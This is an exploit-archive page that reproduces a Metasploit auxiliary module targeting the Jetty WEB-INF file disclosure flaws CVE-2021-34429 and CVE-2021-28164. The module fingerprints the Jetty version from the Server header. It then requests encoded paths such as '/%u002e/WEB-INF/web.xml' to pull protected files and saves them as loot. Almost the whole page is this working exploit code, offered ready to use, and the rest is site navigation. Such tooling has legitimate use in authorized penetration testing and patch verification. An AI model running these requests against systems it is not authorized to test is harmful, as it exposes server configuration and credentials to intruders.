Jetty WEB-INF File Disclosure

Jetty WEB-INF File Disclosure: Posted Aug 31, 2024; Authored by h00die, Mayank Deshmukh, cangqingzhe, charlesk40, lachlan roberts | Site metasploit.com; Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access protected files in the WEB-INF folder. Versions effected are: 9.4.37.v20210219, 9.4.38.v20210224 and 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5. Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely to have information of value.; tags | exploit, web; advisories | CVE-2021-28164, CVE-2021-34429; SHA-256 | 8dfcee78eebf17abc7fd9c39192937639d93c646932d8c726dffcbafbedbf39b; Download | Favorite | View

Jetty WEB-INF File Disclosure

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Jetty WEB-INF File Disclosure',
        'Description' => %q{
          Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access
          protected files in the WEB-INF folder. Versions effected are:
          9.4.37.v20210219, 9.4.38.v20210224 and 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5.
          Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely
          to have information of value.
        },
        'Author' => [
          'h00die', # msf module
          'Mayank Deshmukh', # EDB module
          'cangqingzhe', # CVE-2021-34429
          'lachlan roberts <lachlan@webtide.com>', # CVE-2021-34429
          'charlesk40' # CVE-2021-28164
        ],
        'References' => [
          [ 'EDB', '50438' ],
          [ 'EDB', '50478' ],
          [ 'URL', 'https://github.com/ColdFusionX/CVE-2021-34429' ],
          [ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm' ], # CVE-2021-34429
          [ 'URL', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5' ], # CVE-2021-28164
          [ 'CVE', '2021-34429' ],
          [ 'CVE', '2021-28164' ]
        ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ ],
          'SideEffects' => [ IOC_IN_LOGS ]
        },
        'DisclosureDate' => '2021-07-15',
        'Actions' => [
          [ 'READ_FILE', { 'Description' => 'Read file on the remote server from WEB-INF folder' } ],
        ],
        'DefaultAction' => 'READ_FILE'
      )
    )
    register_options([
      Opt::RPORT(8080),
      OptString.new('FILE', [false, 'File in WEB-INF to retrieve', 'web.xml']),
      OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-34429', ['CVE-2021-34429', 'CVE-2021-28164']])
    ])
  end

  def check
    res = send_request_cgi('uri' => '/')
    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
    return Exploit::CheckCode::Safe("#{peer} - No Server header found") unless res.headers['Server']
    unless /Jetty\((?<version>[^)]+)\)/ =~ res.headers['Server']
      return Exploit::CheckCode::Safe("#{peer} - Unable to detect Jetty version from server header: #{res.headers['Server']}")
    end

    vprint_status("Found version: #{version}")
    version = Rex::Version.new(version)

    if version == Rex::Version.new('9.4.37.v20210219') || version == Rex::Version.new('9.4.38.v20210224')
      print_good("#{version} vulnerable to CVE-2021-28164")
      return Exploit::CheckCode::Detected
    elsif version.between?(Rex::Version.new('9.4.37'), Rex::Version.new('9.4.43')) ||
          version.between?(Rex::Version.new('10.0.1'), Rex::Version.new('10.0.6')) ||
          version.between?(Rex::Version.new('11.0.1'), Rex::Version.new('11.0.6'))
      print_good("#{version} vulnerable to CVE-2021-34429")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe('Server not vulnerable')
  end

  def pick_payload
    case datastore['CVE']
    when 'CVE-2021-34429'
      payload = '%u002e'
    when 'CVE-2021-28164'
      payload = '%2e'
    end

    payload
  end

  def run
    res = send_request_cgi('uri' => "/#{pick_payload}/WEB-INF/#{datastore['FILE']}")
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
    path = store_loot("jetty.#{datastore['FILE']}", 'text/plain', target_host, res.body, datastore['FILE'], 'Jetty WEB-INF File')
    print_good("File stored to #{path}")
    print_good(res.body)
  end

end

Top Authors In Last 30 Days

Red Hat 240 files
indoushka 173 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,123)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,209)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,823)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,848)
UNIX (9,455)
UnixWare (188)
Windows (6,772)
Other

Jetty WEB-INF File Disclosure

Jetty WEB-INF File Disclosure

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Jetty WEB-INF File Disclosure

Share This

Jetty WEB-INF File Disclosure

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems